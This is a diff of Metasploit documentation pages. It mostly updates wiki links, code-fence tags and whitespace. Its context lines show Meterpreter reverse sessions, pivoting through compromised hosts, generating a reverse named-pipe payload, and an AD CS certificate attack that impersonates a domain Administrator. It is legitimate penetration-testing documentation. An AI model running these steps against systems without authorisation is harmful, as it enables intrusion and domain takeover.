 Behind the scenes, Meterpreter now maintains a circular linked list of transports in memory while running. When a transport fails, Meterpreter will shut down and clean up the current transport mechanism resources, and will move onto the next one in the list. From there, Meterpreter will use this transport configuration to attempt to reconnect to Metasploit. It will continue to make these attempts until one of the following occurs:

@@ -8,7 +8,7 @@ For these reasons, and more, the new `sleep` command in Meterpreter was created.

 ## Silent shells

-Noise during an assessment is not necessarily a good thing. With the advent of Meterpreter's new support and control of [multiple transports](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control), Meterpreter has the ability to change transports and therefore change the traffic pattern for communication. However, sometimes this isn't enough and sometimes users want to be able to shut the session off temporarily.
+Noise during an assessment is not necessarily a good thing. With the advent of Meterpreter's new support and control of [[multiple transports|./Meterpreter-Transport-Control.md]], Meterpreter has the ability to change transports and therefore change the traffic pattern for communication. However, sometimes this isn't enough and sometimes users want to be able to shut the session off temporarily.

 The `sleep` command is designed to do just that: make the current Meterpreter session go to sleep for a specified period of time, and the wake up again once that time has expired.

@@ -74,7 +74,7 @@ Session Expiry  : @ 2015-06-09 19:56:05
    *     tcp://10.1.10.40:6000  300        3600         10
 ```

-The first part of the output is the session expiry time. To learn more about expiry time, see [Meterpreter Timeout Control][]. 
+The first part of the output is the session expiry time. To learn more about expiry time, see [Meterpreter Timeout Control][].

 The above output shows that we have one transport enabled that is using `TCP`. We can infer that the transport was a `reverse_tcp` (rather than `bind_tcp`) due to the fact that there is a host IP address in the transport URL. If it was a `bind_tcp`, this would be blank.

@@ -88,8 +88,8 @@ Session Expiry  : @ 2015-06-09 19:56:05

    Curr  URL                                                                                                    Comms T/O  Retry Total  Retry Wait  User Agent               Proxy Host  Proxy User  Proxy Pass  Cert Hash
    ----  ---                                                                                                    ---------  -----------  ----------  ----------               ----------  ----------  ----------  ---------
-    *     tcp://10.1.10.40:6000                                                                                  300        3600         10                                                                       
-          http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/  100000     50000        2500        Totes-Legit Browser/1.1                                      
+    *     tcp://10.1.10.40:6000                                                                                  300        3600         10
+          http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/  100000     50000        2500        Totes-Legit Browser/1.1
 ```

 ### Adding transports
@@ -174,7 +174,7 @@ meterpreter > transport next
 [+] Successfully changed to the next transport, killing current session.

 [*] 10.1.10.35 - Meterpreter session 1 closed.  Reason: User exit
-msf exploit(handler) > 
+msf exploit(handler) >
 [*] 10.1.10.40:46130 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ...
 [*] Meterpreter session 2 opened (10.1.10.40:5105 -> 10.1.10.40:46130) at 2015-06-02 20:53:54 +1000

@@ -273,7 +273,7 @@ Session Expiry  : @ 2015-07-10 07:39:08
    ----  ---                    ---------  -----------  ----------
    *     tcp://10.1.10.40:5000  300        3600         10

-meterpreter > 
+meterpreter >
 ```

 ### Resilient transports
@@ -350,7 +350,7 @@ The session is back up and running as if nothing had gone wrong.

 In the case where Meterpreter is configured with only a single transport mechanism, this process still takes place. Meterpreter's transport list implementation is a cyclic linked-list, and once the end of the list has been reached, it simply starts from the beginning again. This means that if there's a list of one transport then Meterpreter will continually attempt to use that one transport until the session expires. This works for both `TCP` and `HTTP/S`.

-For important detail on network resiliency, please see the [reliable network communication documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication).
+For important detail on network resiliency, please see the [[reliable network communication documentation|./Meterpreter-Reliable-Network-Communication.md]]

 ## Supported Meterpreters

@@ -363,5 +363,5 @@ The following Meterpreter implementations currently support the transport comman
 * Java
 * Python

-  [Timeout documentation]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control
-  [Reliable Network documentation]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication
+  [Timeout documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html
+  [Reliable Network documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html
@@ -11,7 +11,7 @@ The help page includes:
 ### How to use it
 After you load a module, you can type ```info -d``` to generate a help page that provides basic usage information and displays the PR history for the module. 

-```
+```msf
 msf> use auxiliary/scanner/smb/smb_login
 msf (smb_login)> info -d
 ```
@@ -67,4 +67,4 @@ These are just suggestions, but it'd be nice if the KB had these sections:
 - **Vulnerable Applications** - Tells users what targets (version numbers) are vulnerable to the module and provides instructions on how to access vulnerable targets for testing.  If possible provide a download link and any setup instructions to configure the software appropriately.
 - **Verification Steps** - Tells users how to use the module and what the expected results are from running the module. 
 - **Options** - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required. 
- - **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module. Include the version number and OS so that this setup can be replicated at a later date.
+ - **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module. Include the version number and OS so that this setup can be replicated at a later date.
@@ -44,7 +44,7 @@ $ cat ~/.msf4/payloads.json
 ```

 Once this payload is launched, the output of the ```sessions -l -v``` command will show the UUID, whether or not the UUID is registered, and any locally-assigned name of the UUID:
-```
+```msf
 msf exploit(handler) > run -j
 [*] 127.0.0.1:36235 (UUID: 68017d72958c40f6/x86=1/windows=1/2015-06-26T00:04:09Z) Staging Native payload ...
 [*] Meterpreter session 1 opened (127.1.1.1:4444 -> 127.0.0.1:36235) at 2015-06-25 17:12:40 -0700
@@ -33,7 +33,7 @@ There a few ways to register this route in Metasploit so that it knows how to re
 ## AutoRoute
 One of the easiest ways to do this is to use the `post/multi/manage/autoroute` module which will help us automatically add in routes for the target to Metasploit's routing table so that Metasploit knows how to route traffic through the session that we have on the Windows 11 box and to the target Windows Server 2019 box. Lets look at a sample run of this command:

-```
+```msf
 meterpreter > background
 [*] Backgrounding session 1...
 msf6 exploit(multi/handler) > use post/multi/manage/autoroute
@@ -80,7 +80,7 @@ msf6 post(multi/manage/autoroute) >
 ```
 If we now use Meterpreter's `route` command we can see that we have two route table entries within Metasploit's routing table, that are tied to Session 1, aka the session on the Windows 11 machine. This means anytime we want to contact a machine within one of the networks specified, we will go through Session 1 and use that to connect to the targets.

-```
+```msf
 msf6 post(multi/manage/autoroute) > route

 IPv4 Active Routing Table
@@ -97,7 +97,7 @@ msf6 post(multi/manage/autoroute) >

 All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entires.

-```
+```msf
 msf6 post(multi/manage/autoroute) > route flush
 msf6 post(multi/manage/autoroute) > route
 [*] There are currently no routes defined.
@@ -108,7 +108,7 @@ Now lets trying doing the same thing manually.
 ## Route
 Here we can use `route add <IP ADDRESS OF SUBNET> <NETMASK> <GATEWAY>` to add the routes from within Metasploit, followed by `route print` to then print all the routes that Metasploit knows about. Note that the Gateway parameter is either an IP address to use as the gateway or as is more commonly the case, the session ID of an existing session to use to pivot the traffic through.

-```
+```msf
 msf6 post(multi/manage/autoroute) > route add 169.254.0.0 255.255.0.0 1
 [*] Route added
 msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240 1
@@ -131,7 +131,7 @@ msf6 post(multi/manage/autoroute) >

 Finally we can check that the route will use session 1 by using `route get 169.254.204.110`

-```
+```msf
 msf6 post(multi/manage/autoroute) > route get 169.254.204.110
 169.254.204.110 routes through: Session 1
 msf6 post(multi/manage/autoroute) >
@@ -141,7 +141,7 @@ If we want to then remove a specific route (such as in this case we want to remo

 Example:

-```
+```msf
 msf6 post(multi/manage/autoroute) > route remove 172.19.176.0/20 1
 [*] Route removed
 msf6 post(multi/manage/autoroute) > route
@@ -160,7 +160,7 @@ msf6 post(multi/manage/autoroute) >
 ## Using the Pivot
 At this point we can now use the pivot with any Metasploit modules as shown below:

-```
+```msf
 msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

 Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
@@ -221,7 +221,7 @@ The Windows Meterpreter payload supports lateral movement in a network through S

 First open a Windows Meterpreter session to the pivot machine:

-```
+```msf
 msf6 > use payload/windows/x64/meterpreter/reverse_tcp
 smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
 lhost => 172.19.182.171
@@ -237,7 +237,7 @@ msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 by

 Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:

-```
+```msf
 msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
 [*] Starting interaction with 1...

@@ -249,7 +249,7 @@ meterpreter > background

 Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine.  Note there is no need to start a handler for the named pipe payload.

-```
+```msf
 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options

 Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
@@ -267,7 +267,7 @@ msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o re
 ```

 After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
-```
+```msf
 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500

 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
@@ -383,7 +383,7 @@ Once routes are established, Metasploit modules can access the IP range specifie
 ### Socks Server Module Setup
 Metasploit can launch a SOCKS proxy server using the module: `auxiliary/server/socks_proxy`. When set up to bind to a local loopback adapter, applications can be directed to use the proxy to route TCP/IP traffic through Metasploit's routing tables. Here is an example of how this module might be used:

-```
+```msf
 msf6 > use auxiliary/server/socks_proxy
 msf6 auxiliary(server/socks_proxy) > show options

@@ -291,7 +291,7 @@ Payload size: 6412437 bytes
 Saved as: /tmp/met-stageless.exe
 ```
 When this payload is executed, the transport is added and shown to be present in the transport list immediately:
-```
+```msf
 msf exploit(handler) > [*] Meterpreter session 2 opened (172.16.52.1:4445 -> 172.16.52.247:49159) at 2015-12-13 11:06:54 +1000

 msf exploit(handler) > sessions -i -1
@@ -331,7 +331,7 @@ Hell no! But the goal is to get closer and closer to perfect as we go. It's up t

 Please do, making good use of the Github issues feature. Better still, create a PR for one!

-  [transport]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control
+  [transport]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html
  [inveigh]: https://github.com/Kevin-Robertson/Inveigh

 ## Currently Loadable Native Libraries
@@ -724,4 +724,4 @@ xml.sax.xmlreader
 xmllib
 xmlrpclib
 zipfile
-```
+```
@@ -4,7 +4,7 @@ Metasploit gets hundreds of issue reports every year on our [issue tracker](http

 But first...two important exceptions to bug/issue reports.

-## When NOT to use Metasploit's issue tracker 
+## When NOT to use Metasploit's issue tracker
 **NOTE:** There are two situations where, even if you have found what you know is a bug, you should not open a bug report on our public issue tracker.
 1. You should not open a bug report on Metasploit Framework's issue tracker if you are a Metasploit Pro customer.
 2. You should not open a bug report when you have found a security issue with Metasploit itself.
@@ -13,14 +13,14 @@ But first...two important exceptions to bug/issue reports.
 If you are a Metasploit Pro customer, you can log in to Rapid7's customer support portal [here](https://www.rapid7.com/for-customers/). You are also able to reach out to your CSM or support representative if you prefer. To provide a consistent customer experience, Metasploit Framework community members, committers, and open-source developers do not offer support for commercial Rapid7 products. Rapid7's support resources and team members are well-equipped to handle your Metasploit Pro support needs!

 ### Security Issues
-If you have a security issue with Metasploit itself, you should email security@rapid7.com or let us know [here](https://www.rapid7.com/security/). Rapid7's disclosure policy is [here](https://www.rapid7.com/security/disclosure/). In general, our security teams are happy to give you credit, inform you about progress, and explore related issues with you if you'd like. They're also happy to keep you anonymous if that's what you prefer. All of this is significantly easier if you report security issues in a manner that lets our teams quickly work with you to understand the problem! Clear communication and coordinated disclosure give us the best chance of fixing any security issues quickly and protecting users. 
+If you have a security issue with Metasploit itself, you should email security@rapid7.com or let us know [here](https://www.rapid7.com/security/). Rapid7's disclosure policy is [here](https://www.rapid7.com/security/disclosure/). In general, our security teams are happy to give you credit, inform you about progress, and explore related issues with you if you'd like. They're also happy to keep you anonymous if that's what you prefer. All of this is significantly easier if you report security issues in a manner that lets our teams quickly work with you to understand the problem! Clear communication and coordinated disclosure give us the best chance of fixing any security issues quickly and protecting users.

 Now on to the good stuff! The Metasploit development community has read thousands of bug reports over the past 15 years, and a well-written bug report makes fixing bugs much faster and easier. In fact, in our experience, how quickly we can understand and fix an issue has more to do with bug report quality than the complexity of the bug itself.

 ## General Rules
 * Ensure the platform you're reporting the issue for is supported. We do not, for instance, support Termux currently. If your platform is not officially supported, the community may still have resources to help, but you should search for and ask about those outside Metasploit's issue tracker.
-* When possible, it helps if you are running the latest stable version of Metasploit Framework, or the latest release of Kali, BlackArch Linux, or your other favorite security distribution that ships with Metasploit. Metasploit's [nightly installers are here](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers) and typically offer the latest Framework release.
-* Review our [code of conduct](https://github.com/rapid7/metasploit-framework/blob/master/CODE_OF_CONDUCT.md) before submitting issues.
+* When possible, it helps if you are running the latest stable version of Metasploit Framework, or the latest release of Kali, BlackArch Linux, or your other favorite security distribution that ships with Metasploit. Metasploit's [[nightly installers are here|./Nightly-Installers.md]] and typically offer the latest Framework release.
+* Review our [[code of conduct|./Code-Of-Conduct.md]] before submitting issues.
 * Use a specific title so we can understand immediately which part of Metasploit is causing the unexpected behavior. "NoMethodError raised on smb_login module" is a great title. "Problem with Metasploit target" is not.
 * Redact any private or sensitive data, such as target IPs or URLs, passwords, or personally identifying information.
 * Please don't comment on closed issues; instead, open a new issue and link to any previous relevant issues.
@@ -31,7 +31,7 @@ We ask for several different pieces of information when users report issues in M
 ### Steps to reproduce
 What did you do to get the results you got? Can you give us step-by-step instructions to get the same results you got? Are you able to consistently reproduce the issue in your own environment?

-### Which OS are you using? What do we need to know about your environment and/or target? 
+### Which OS are you using? What do we need to know about your environment and/or target?
 Tell us which operating system you're using and any relevant information about your setup. If the module or feature you're having trouble with requires any external dependencies, check whether they are installed, and (if not) whether installing them could solve your problem.

 If you're having problems with a target (victim), tell us the target operating system and service versions.(Please ensure you've redacted any private or sensitive data!) If the module or feature you're having trouble with requires any external dependencies, check whether that could solve your problem.
@@ -52,17 +52,17 @@ Did you install Metasploit with...
 - [ ] Commercial installer (from <https://www.rapid7.com/products/metasploit/download/>)
 - [ ] Source install (please specify Ruby version)

-This list isn't intended to be exhaustive - it's simply the bare minimum set of details we need to reproduce and diagnose your bug. You should feel free to include as much detailed information as you need to help us understand how you got the results you did. 
+This list isn't intended to be exhaustive - it's simply the bare minimum set of details we need to reproduce and diagnose your bug. You should feel free to include as much detailed information as you need to help us understand how you got the results you did.

 ## Avoid Duplicates
 You may not be the first person to notice the problem you're seeing as a Framework user, and the more bug reports we get, the more difficult it is to sort through them all for easy fixes or high-priority issues. Here are some ways to help a previously-reported bug get noticed more quickly and prioritized (if necessary).

-* Having a problem with a module? Try [searching that module's name](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+is%3Aopen+psexec) to see if anyone else has reported (or fixed!) your problem recently. 
+* Having a problem with a module? Try [searching that module's name](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+is%3Aopen+psexec) to see if anyone else has reported (or fixed!) your problem recently.
 * Getting a strange error and not sure what it means? [Search for the error](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+URI.unescape) to see if others have had or addressed the same problem you are facing.
 * Pro tip: Search both [open and closed issues](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue) to see if what you're reporting was resolved (in which case you might simply need to update to a later version of Metasploit) or if there's a workaround someone else has discovered that might help you while we get to your issue.
-* If you DO discover that someone else has already reported the issue you're experiencing, please do update that issue with any new information - for instance, that you're experiencing the issue on a different OS or in a different version of Metasploit than what the original issue reports described. 
+* If you DO discover that someone else has already reported the issue you're experiencing, please do update that issue with any new information - for instance, that you're experiencing the issue on a different OS or in a different version of Metasploit than what the original issue reports described.
 * If you find closed issues or resolved bugs that describe a problem you're having on a later version of Metasploit, that could indicate a regression (old bugs that have been reintroduced). It helps us if you note this in your issue report. Fixes for regressions can be fast, so making note of possible regressions is useful.
-* Finally, you might find a bug that's been rejected or closed without resolution. In many of these cases, the problem is something external to Metasploit: user error, configuration issues, known incompatibilities, etc. If you think that the original resolution was in error or incomplete, open a **new** issue report and refer to any related issue reports. 
+* Finally, you might find a bug that's been rejected or closed without resolution. In many of these cases, the problem is something external to Metasploit: user error, configuration issues, known incompatibilities, etc. If you think that the original resolution was in error or incomplete, open a **new** issue report and refer to any related issue reports.

 ## Other Notes
 * Networking is hard, as we've often said even among ourselves! You might want to see if your network configuration is unusual in any way, or do a regular old internet search to check whether your config might be the problem.
@@ -73,10 +73,10 @@ You may not be the first person to notice the problem you're seeing as a Framewo

 If you're a superhero and you figured out the root cause of a bug AND found a way to fix it, you can send your Metasploit fixes and improvements our way! The best way to get your fix into Metasploit quickly is to patch your own fork and submit a pull request to Metasploit. You get extra gratitude from all of us when you do this, and you'll also get a shout-out in the [weekly Metasploit wrap-up](https://blog.rapid7.com/tag/metasploit-weekly-wrapup/).

-You can find a guide on setting up your own [Metasploit Development Environment here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment).
+You can find a guide on setting up your own [[Metasploit Development Environment here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]].

 ## Public Discussion
-Some projects and companies don't like discussing bugs in the bug report itself. Some even have policies of not doing this. Metasploit is not one of those projects. We greatly prefer public communication over private communication because it makes community knowledge accessible and searchable to everyone. That said, if you have specific privacy or security concerns, we're always happy to speak privately. You can get in touch with us at msfdev@metasploit.com. 
+Some projects and companies don't like discussing bugs in the bug report itself. Some even have policies of not doing this. Metasploit is not one of those projects. We greatly prefer public communication over private communication because it makes community knowledge accessible and searchable to everyone. That said, if you have specific privacy or security concerns, we're always happy to speak privately. You can get in touch with us at msfdev@metasploit.com.

 ## Resolved Bugs
 Your bug should be considered "Resolved" once there's a fix landed in the [Metasploit-Framework master branch](https://github.com/rapid7/metasploit-framework). People who track that branch will have the fix available quickly. It may take other distributions that include Metasploit (e.g., Kali) a few days to pull in fixes, depending on their individual release cadences.
@@ -10,7 +10,7 @@ clone, and all gems have to be reinstalled every time. Also, some rspec tests re
 network connections to assets on the Internet. Sometimes, GitHub Actions servers are under a lot of
 load, and builds time out.

-The best way to diagnose these problems is simply to restart the build. Note, only [Committers](https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights) have rights to do this. If that doesn't clear things up, or if it's obvious that there are real failures (since you've read the rspec results and have read the tests), the first order of business is to undo your bad commit.
+The best way to diagnose these problems is simply to restart the build. Note, only [[Committers|./Committer-Rights.md]] have rights to do this. If that doesn't clear things up, or if it's obvious that there are real failures (since you've read the rspec results and have read the tests), the first order of business is to undo your bad commit.

 **Note**: in branches other than `master`, you can usually just fix things normally with new commits. There are plenty of "whoops" commit messages in our history.

@@ -40,7 +40,7 @@ If you already have msfconsole running, use a `reload_all` command to pick up yo
 mkdir -p $HOME/.msf4/modules/exploits/test
 curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
 todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
-todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb 
+todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 100  1140    0  1140    0     0   3607      0 --:--:-- --:--:-- --:--:--  7808
@@ -48,7 +48,7 @@ todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gis

 Then, in my msfconsole window:

-```
+```msf
 msf > reload_all
 [*] Reloading modules from all module paths...
 IIIIII    dTb.dTb        _.---._
@@ -65,7 +65,7 @@ I love shells --egypt
 + -- --=[ 1122 exploits - 707 auxiliary - 192 post
 + -- --=[ 307 payloads - 30 encoders - 8 nops

-msf > use exploit/test/test_module 
+msf > use exploit/test/test_module
 msf exploit(test_module) > info

       Name: Fake Test Module
@@ -99,9 +99,9 @@ References:

 msf exploit(test_module) > exploit

-[*] Started reverse handler on 192.168.145.1:4444 
+[*] Started reverse handler on 192.168.145.1:4444
 [+] Hello, world!
-msf exploit(test_module) > 
+msf exploit(test_module) >
 ```

 ## Troubleshooting
@@ -116,7 +116,7 @@ That's really all there is to it. The most common problems that people (includin

 Note that the `$HOME` directory for Metasploit Community Edition is going to be `root` and not your own user directory, so if you are expecting modules to show up in the Metasploit Pro web UIs, you will want to stash your external modules in `/root/.msf4/modules`. Of course, this means you need root access to the machine in question, but hey, you're a l33t Metasploit user, so that shouldn't be too hard.

-Also note that if your modules are not displaying in the web UI, you should restart Pro service.  
+Also note that if your modules are not displaying in the web UI, you should restart Pro service.

 ### Windows

@@ -126,7 +126,7 @@ For Windows users, the above is all true, except for accessing the modules from

 Any module that requires on changes to core library functions, such as new protocol parsers or other library mixins, aren't going to work out for you this way -- you're going to end up spewing errors all over the place as your module tries to load these classes. It's possible to write modules as completely self-contained in nearly all cases (thanks to Ruby's open class architecture), but such modules nearly always get refactored later to make the protocol and other mixin bits available to other modules.

-In this case, it would be better to work with modules like that using a proper GitHub checkout with a development branch -- see the [dev environment setup docs](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) for tons more on that.
+In this case, it would be better to work with modules like that using a proper GitHub checkout with a development branch -- see the [[dev environment setup docs|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] for tons more on that.

 ## A final warning

@@ -61,5 +61,5 @@ HTTP/S communications in Windows is a hairy beast, and trying to cater for all c
  [WinInet]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa383630%28v=vs.85%29.aspx
  [WinHTTP]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa382925%28v=vs.85%29.aspx
  [winhttp_wininet]: https://msdn.microsoft.com/en-us/library/windows/desktop/hh227298%28v=vs.85%29.aspx
-  [Paranoid Mode]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode
+  [Paranoid Mode]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html
  [OJ]: https://github.com/OJ
@@ -2,7 +2,7 @@
 Often times when testing Gem file updates, particularly from other repositories such as [rex-powershell](https://github.com/rapid7/rex-powershell) or [rex-text](https://github.com/rapid7/rex-text), one will need to find some way of testing whether the updated Gem file works as expected within Metasploit Framework. There are many different ways to do this, however this guide will only focus on one method for simplicities sake, as this is the one that has been known to work with the least amount of prerequisite setup.

 ## Instructions
-1. Set up a working Metasploit development setup as described at the [Setting Up a Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) wiki page. Be sure to set up your SSH keys as part of this setup.
+1. Set up a working Metasploit development setup as described at the [[Setting Up a Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] wiki page. Be sure to set up your SSH keys as part of this setup.
 2. Clone whatever PR it is that you wish to work on. For example to work on <https://github.com/rapid7/rex-text/pull/30>, do `git clone git@github.com:rapid7/rex-text.git`, then `cd rex-text`, followed by `git checkout origin/pr/30`.
 3. Go to the location of your git clone of Metasploit Framework and do `cp Gemfile.local.example Gemfile.local`. Ensure that no file named `Gemfile.local.lock` exists. If one does, remove it.
 4. Inside your `Gemfile.local` file, edit it so it looks something like the following:
@@ -62,7 +62,7 @@ single_scanner
 multi_scanner
 ```

-The `remote_exploit_cmd_stager` module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the [flavor](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers) specified for the command stager.
+The `remote_exploit_cmd_stager` module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the [[flavor|./How-to-use-command-stagers.md]] specified for the command stager.

 The `capture_server` module type is used when a module is designed to simulate a service to capture credentials for connecting clients.

@@ -22,7 +22,7 @@ If you go to metasploit-framework/documentation/modules, you'll see that there a

 For example:

-```
+```msf
 msf> use auxiliary/scanner/smb/smb_login
 msf (smb_login)> info

@@ -40,4 +40,4 @@ These are just suggestions, but it'd be nice if the KB had these sections:
 - **Vulnerable Applications** - Tells users what targets are vulnerable to the module and provides instructions on how to access vulnerable targets for testing.  
 - **Verification Steps** - Tells users how to use the module and what the expected results are from running the module. 
 - **Options** - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required. 
- - **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module.
+ - **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module.
@@ -154,7 +154,7 @@ To run the module, specify the login credentials for an AD user, and set `RHOSTS
 This will cause the module to log into the LDAP server on the target DC, and list out the vulnerable certificate templates and which CA servers they are available from,
 as well as the permissions that are required to enroll in these certificate templates. The following is a sample output of running this against a test server:

-```
+```msf
 msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options

@@ -317,7 +317,7 @@ Getting a certificate as the current user is great, but what we really want to d

 If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can quickly set this up:

-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
 CA => daforest-WIN-BR0CCBA815B-CA
@@ -358,7 +358,7 @@ To do this we will use the `ipcr_cert` module and we will set the usual options,

 For the first run, we will set the usual `RHOSTS`, `CA`, and `CERT_TEMPLATE` details, being sure to set `CERT_TEMPLATE` to the vulnerable `ESC2-Template` certificate template, and supply valid SMB login credentials. This will grant us a certificate for our current user that is based off of the vulnerable `ESC2-Template`:

-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
@@ -425,7 +425,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >

 Next, we need to use the PFX file that we got to request another certificate to authenticate on behalf of another user. We will use the `PFX` option to specify the PFX file, and the `ON_BEHALF_OF` setting to specify the user we would like to authenticate on behalf of. Finally we will change the certificate template to another certificate template that we are able to enroll in. The default `User` certificate should work here since it allows enrollment by any authenticated domain user.

-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):
@@ -540,7 +540,7 @@ Narrowing this list down to those we can actually enroll in as users, this leave

 We'll first get the cert using `ipcr_cert` with the `ESC3-Template1` certificate.

-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > show options

@@ -608,7 +608,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >

 Next we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:

-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
 PFX => /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
@@ -662,7 +662,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >

 Just to show this is also possible with `ESC3-Template2` here is a snippet showing that also works:

-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template2
 CERT_TEMPLATE => ESC3-Template2
 msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
@@ -723,7 +723,7 @@ Certificates from Metasploit do not require a password, but if the certificate w
 one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` datastore option to the Domain Controller, then
 run the `GET_TGT` action.

-```
+```msf
 msf6 > use kerberos/get_ticket

 Matching Modules
@@ -102,7 +102,7 @@ Regardless of your choice, you'll want to make sure that, when inside the `~/git

 ```
 $ cd ~/git/metasploit-framework
-$ cat .ruby-version 
+$ cat .ruby-version
 3.0.2
 $ ruby -v
 ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
@@ -209,7 +209,7 @@ rake spec
 ```

 You should see over 9000 tests run, mostly resulting in green dots, a few in yellow stars, and no red errors.
- 
+
 # Great!  Now what?

 We're excited to see your upcoming contributions of new modules, documentation, and fixes!  Check out our [wiki documentation][wiki-documentation] and, if you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues].   Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.
@@ -217,7 +217,7 @@ We're excited to see your upcoming contributions of new modules, documentation,
